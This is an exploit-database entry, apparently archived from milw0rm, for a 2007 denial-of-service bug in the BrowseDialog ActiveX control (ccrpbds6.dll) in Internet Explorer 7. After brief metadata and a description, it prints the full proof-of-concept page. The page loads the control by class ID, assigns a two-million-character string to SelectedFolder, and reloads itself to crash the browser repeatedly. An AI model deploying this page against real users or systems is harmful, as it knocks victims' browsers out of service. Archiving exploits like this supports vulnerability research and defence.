header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
shinnai
N/A
CVSS
N/A
Denial of Service
CWE
Product Name: Internet Explorer
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP Professional SP2
2007

BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service

The exploit uses a malicious object to trigger a Denial of Service (DoS) in Internet Explorer. It sends a large string as an argument to the SelectedFolder property of the BrowseDialog class, causing the browser to crash or become unresponsive. This vulnerability was tested on Windows XP Professional SP2 with Internet Explorer 7.

Mitigation:

Unknown
Source

Exploit-DB raw data:

<!--
-----------------------------------------------------------------------------------------------------------
BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------------------------------------
-->
<html>
<object classid='clsid:19E6E148-BAEC-11D2-B03A-EAFC20524153' id='CCRP_BDc'></object>
<script language='vbscript'>

argCount = 1

arg1=String(2000000, "A")

CCRP_BDc.SelectedFolder = arg1
</script>

<script language='javascript'>
document.location.reload()
</script>

# milw0rm.com [2007-01-18]